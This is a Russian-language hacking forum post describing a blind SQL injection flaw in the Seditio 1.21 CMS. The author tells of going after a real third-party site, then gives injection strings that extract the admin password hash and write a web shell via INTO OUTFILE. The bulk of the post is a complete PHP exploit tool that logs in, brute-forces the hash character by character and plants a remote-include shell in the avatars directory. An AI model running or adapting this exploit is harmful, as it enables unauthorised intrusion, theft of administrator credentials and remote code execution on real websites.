в общем как-то в ирц пеныч кинул линк на снифер, типа понтанулся. снифер http://na-s.ru от webxakep.net. на одном серваке был сайт voxma.ru с seditio. багу нашел быстро, но плоент написал только дня через 3 чтоли. а вохма в это время ушла в даун, так и ничего не сделал. кста выше нолик выкладывал шеллег, но я поздно заметил =\ Code: http://search.live.com/results.aspx?q=ip%3A194.85.89.245&go=&form=QBLH pm.send.inc.php PHP: $touser_src = explode (",", $newpmrecipient); $touser_req = count($touser_src); foreach($touser_src as $k => $i) { $touser_sql[] = "'".trim(sed_import($i, 'D', 'TXT'))."'"; } $touser_sql = implode (',', $touser_sql); $touser_sql = '('.$touser_sql.')'; $sql = sed_sql_query("SELECT user_id, user_name FROM $db_users WHERE user_name IN $touser_sql"); Code: $touser_sql = implode (',', $touser_sql) объединяет в массив имена получателей ПМ, разделенных запятыми. соответственно в скуле пришлось извратиться без использования оных. вытаскиваем хеш: Code: newpmrecipient=1111')+and((select+case+when+ascii(substring((select+user_password+from+sed_users+where+user_id=1)+from+1+for+1))=1+then+1+else+2+end)>111)/*&.... инту аутфайл, если файл прив включен: Code: newpmrecipient=11111')+into+outfile+'/asd/asd/shell.php'+fields+terminated+by+''+optionally+enclosed+by+0xhexshellnopremer/*&... PHP: <?php // seditio.121 remote blind sql injection vulnerability // bug found and exploit write by c411k // grats all https://forum.antichat.ru // 12.11.08 //error_reporting(0); @ini_set("max_execution_time",0); @ini_set('output_buffering',0); @set_magic_quotes_runtime(0); @set_time_limit(0); @ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n"); header("Pragma: no-cache"); ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>xeHko_seditio.121</title> <style> <!-- A:link {COLOR: #B9B9BD; TEXT-DECORATION: none} A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none} A:active {COLOR: #228B22; TEXT-DECORATION: none} A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline} BODY { margin="5"; FONT-WEIGHT: normal; COLOR: #B9B9BD; BACKGROUND: #44474F; FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; } --> </style> </head> <body> <?php function sendd($host, $patch, $method, $data_gp, $cook1e) { global $send_http; $s = array(); $url = fsockopen($host, 80); $send_http = "$method http://$host/$patch HTTP/1.1\r\n"; $send_http .= "Host: $host\r\n"; $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n"; $send_http .= "Cookie: $cook1e\r\n"; $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n"; $send_http .= "Content-Length: ".strlen($data_gp)."\r\n"; $send_http .= "Connection: Close\r\n\r\n"; if ($method === 'POST') { $send_http .= $data_gp; } //print_r($send_http); fputs($url, $send_http); while (!feof($url)) $s[] = fgets($url, 1028); fclose($url); return $s; } function myflush($timee) { if(ob_get_contents()) { ob_flush(); ob_clean(); flush(); usleep($timee); } } function get_fullp() { global $p4, $hostname; if(preg_match("/a-z, A-Z, 0-9 and \'-,\' in <b>(.*)<\/b> on/", implode(sendd($hostname, $p4.'/plug.php?e=search', 'GET', '', 'PHPSESSID=./[]')), $m)) { return str_replace('\\', '/', substr($m['1'], 0, -17)); } } function get_shell() { global $p4, $razd, $hostname, $pe4enki, $myname, $x, $shell, $fullp; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'into'.$razd.'outfile'.$razd.'\''.$fullp.'\''.$razd.'fields'.$razd.'terminated'.$razd.'by'.$razd.'\'\''.$razd.'optionally'.$razd.'enclosed'.$razd.'by'.$razd.$shell.'/*&newpmtitle=111d1&newpmtext=333ads&x='.$x; sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'POST', $expl, $pe4enki); } function login($uname, $pass) { global $p4, $hostname; $get_cookie = sendd($hostname, $p4.'/users.php?m=auth&a=check', 'POST', 'rusername='.$uname.'&rpassword='.$pass.'&x=GUEST', ''); foreach ($get_cookie as $value) { if (strpos($value, 'Set-Cookie: PHPSESSID=') !== false) { $temp = explode(";", $value); $pe4enki = strstr($temp[0], 'PHPSESSID'); } if (strpos($value, 'Set-Cookie: SEDITIO=') !== false) { $temp = explode(";", $value); $pe4enki .= '; '.strstr($temp[0], 'SEDITIO'); break; } } return trim($pe4enki); } function secret() { global $p4, $hostname, $pe4enki; if(preg_match("/<div><input type=\"hidden\" id=\"x\" name=\"x\" value=\"(.*)\" \/><\/div><\/form>/", implode(sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'GET', '', $pe4enki)), $m)) { return $m['1']; } } //hash 48-57 97-102 function get_pass() { global $p4, $razd, $hostname, $tbl_user, $userid, $pe4enki, $myname, $x, $result; for($n = 0; ++$n <= 32;) { for($i = 47; ++$i <= 102;) { if($i == 58) $i = 97; $expl = 'newpmrecipient='.$myname.'\')'.$razd.'and((select'.$razd.'case'.$razd.'when'.$razd.'ascii(substring((select'.$razd.'user_password'.$razd.'from'.$razd.$tbl_user.$razd.'where'.$razd.'user_id='.$userid.')'.$razd.'from'.$razd.$n.$razd.'for'.$razd.'1))='.$i.$razd.'then'.$razd.'1'.$razd.'else'.$razd.'2'.$razd.'end)=1)/*&newpmtitle=ru_antichat_by_c411k&newpmtext=o9e6u_gema_privetkakdela_tygdepropal_izvEni&x='.$x; if(!preg_match("/At least one recipient was wrong(.*)/", implode(sendd($hostname, $p4.'/pm.php?m=send&a=send&to=', 'POST', $expl, $pe4enki)))) { echo chr($i); $result .= chr($i); break; } myflush(500); } } } if (!$_GET) { echo '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post"> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="get_hash" type="submit" value=" get admin passwd... "><br> <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD"> ¬ hostname, for expamle "antichat.ru" <input style="background-color: #31333B; color: #B9B9BD;" name="path" value="seditio.121"><font color="#B9B9BD"> ¬ path to index seditio <input style="background-color: #31333B; color: #B9B9BD;" name="userid" value="1"><font color="#B9B9BD"> ¬ admin id, default 1 <input style="background-color: #31333B; color: #B9B9BD;" name="myname" value="c411k"><font color="#B9B9BD"> ¬ register user login <input style="background-color: #31333B; color: #B9B9BD;" name="mypwd" value="password"><font color="#B9B9BD"> ¬ register user password <input style="background-color: #31333B; color: #B9B9BD;" name="prefix" value="sed_users"><font color="#B9B9BD"> ¬ name user table (or database.user_table) , default sed_users. <input style="background-color: #31333B; color: #B9B9BD;" name="razd" value="+"><font color="#B9B9BD"> ¬ +, %20, /**/ <br> <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="get_shell" type="submit" value=" try into outfile "><br> <input style="background-color: #31333B; color: #B9B9BD;" name="fullp" value="/home/www/seditio.121/datas/avatars/out.php"><font color="#B9B9BD"> ¬ full path <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="try_fullp" type="submit" value=" try get full path "> <textarea style="background-color: #31333B; color: #B9B9BD;" name="shell" cols=44 rows=7><?php require($_REQUEST[\'shell\']);?></textarea></form>'; } if (isset($_GET['go_fuck'])) { $hostname = $_POST['hostname']; $p4 = $_POST['path']; $razd = $_POST['razd']; $tbl_user = $_POST['prefix']; $userid = $_POST['userid']; $myname = $_POST['myname']; $mypwd = $_POST['mypwd']; $fullp = $_POST['fullp']; $shell = $_POST['shell']; //$result = array('pass' => '', 'salt' => ''); if (isset($_POST['try_fullp'])) echo '<pre>'.get_fullp().'datas/avatars/out.php'; if (isset($_POST['get_hash'])) { $pe4enki = login($myname, $mypwd); echo '<pre>cookies: '.$pe4enki.'<br>'; myflush(500); $x = secret(); echo 'o9e6u: '.$x.'<br>'; myflush(500); echo '<pre>password hash (md5): '; get_pass(); } if (isset($_POST['get_shell'])) { $pe4enki = login($myname, $mypwd); echo '<pre>cookies: '.$pe4enki.'<br>'; myflush(500); $x = secret(); echo 'o9e6u: '.$x.'<br>'; myflush(500); $shell = '0x'.bin2hex(stripslashes(trim($shell))); get_shell(); echo '<pre>check: '.$hostname.'/'.$p4.'/datas/avatars/out.php'; } } ?>
